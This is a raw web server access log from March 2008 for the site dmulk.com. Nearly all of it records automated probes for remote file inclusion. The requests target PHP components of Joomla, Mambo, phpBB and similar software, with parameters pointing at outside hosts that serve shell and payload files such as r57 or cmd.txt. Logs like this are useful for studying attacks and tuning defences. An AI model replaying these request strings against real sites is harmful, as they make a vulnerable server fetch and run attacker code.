81.92.222.169 - - [02/Mar/2008:08:25:55 -0800] "GET /index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:08:25:55 -0800] "GET /logs/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:26:21 -0800] "GET /logs/access_080208.log/pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:26:21 -0800] "GET /pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:26:22 -0800] "GET /logs/pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:26:48 -0800] "GET /logs/access_080215.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:08:26:56 -0800] "GET /index.php?x=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:08:26:56 -0800] "GET /logs/index.php?x=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.116.41.19 - - [02/Mar/2008:08:27:22 -0800] "GET /logs/index.php?x=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
60.249.42.221 - - [02/Mar/2008:08:27:26 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [02/Mar/2008:08:27:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [02/Mar/2008:08:27:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [02/Mar/2008:08:27:48 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [02/Mar/2008:08:27:48 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [02/Mar/2008:08:27:49 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:28:03 -0800] "GET /logs/access_080216.log//?index.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:28:03 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 200 36979 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:08:28:04 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
60.249.42.221 - - [02/Mar/2008:08:28:04 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:08:28:05 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:08:28:30 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:08:28:31 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:28:49 -0800] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:28:52 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:28:52 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:28:54 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:08:29:23 -0800] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:08:29:23 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:08:29:40 -0800] "GET /logs/access_080104.log/stats/tools/send_reminders.php?includedir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:08:29:43 -0800] "GET /stats/tools/send_reminders.php?includedir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:08:29:44 -0800] "GET /logs/stats/tools/send_reminders.php?includedir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.105 - - [02/Mar/2008:08:29:46 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://myportals.de//css/style.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.220.207.105 - - [02/Mar/2008:08:29:46 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://myportals.de//css/style.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:29:54 -0800] "GET /logs/access_080121.log//redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:29:55 -0800] "GET //redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:29:55 -0800] "GET /logs//redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:30:28 -0800] "GET /logs/access_080207.log/pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.220.207.105 - - [02/Mar/2008:08:30:54 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://myportals.de//css/style.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:31:01 -0800] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:31:23 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:31:23 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.220.207.105 - - [02/Mar/2008:08:31:44 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://myportals.de//css/style.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:08 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:09 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:09 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:32:11 -0800] "GET /logs//main.php?sayfa=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:32:11 -0800] "GET //main.php?sayfa=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:32:11 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:14 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:14 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:15 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:08:32:25 -0800] "GET /logs/access_080106.log/stats/tools/send_reminders.php?includedir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:27 -0800] "GET /logs/access_080107.log//modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.212 - - [02/Mar/2008:08:32:29 -0800] "GET /?N=D HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:08:32:31 -0800] "GET /logs/access_080107.log//modules/Neos_Chronos/header.php?base_folder=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:32:39 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:32:41 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:32:47 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:32:51 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:32:52 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:32:55 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:32:55 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:32:59 -0800] "GET /logs/access_080216.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:32:59 -0800] "GET /logs/access_080216.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:32:59 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:33:00 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:33:00 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:08:33:01 -0800] "GET /logs/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:33:09 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:34:37 -0800] "GET /logs/access.log//?index.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:34:40 -0800] "GET /logs/access_080215.log//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:34:40 -0800] "GET //xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:34:40 -0800] "GET /logs//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:08:34:40 -0800] "GET /logs/access.log//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:34:43 -0800] "GET /logs/access_080215.log//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:34:43 -0800] "GET //xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:34:43 -0800] "GET /logs//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:08:34:44 -0800] "GET /logs/access.log//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:34:53 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:35:03 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:35:13 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:08:35:44 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.179 - - [02/Mar/2008:08:35:50 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:08:36:37 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:08:36:37 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:08:36:41 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:08:36:41 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:36:46 -0800] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:36:46 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.147.163.85 - - [02/Mar/2008:08:36:46 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:08:37:10 -0800] "GET /logs/access_080119.log//components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:37:42 -0800] "GET /logs/access_080221.log//update/update5.php?lang=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:37:42 -0800] "GET //update/update5.php?lang=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:37:42 -0800] "GET /logs//update/update5.php?lang=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.38.62.39 - - [02/Mar/2008:08:38:00 -0800] "GET /logs//podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://asidfloridawestcoast.com/calendar/includes/test3.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.38.62.39 - - [02/Mar/2008:08:38:00 -0800] "GET //podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://asidfloridawestcoast.com/calendar/includes/test3.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:08:38:01 -0800] "GET /logs/access.log//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:08:38:02 -0800] "GET //xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:08:38:02 -0800] "GET /logs//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:08:38:06 -0800] "GET /logs/access_080215.log//xzclf/-52/events/2008-02-27/ipblock.inc.php?path_escape=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [02/Mar/2008:08:38:20 -0800] "GET /logs/access_080211.log/index.php?action=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [02/Mar/2008:08:38:20 -0800] "GET /logs/index.php?action=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.233 - - [02/Mar/2008:08:38:37 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:39:04 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:39:04 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:08:39:05 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:08:39:05 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:08:39:05 -0800] "GET /modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
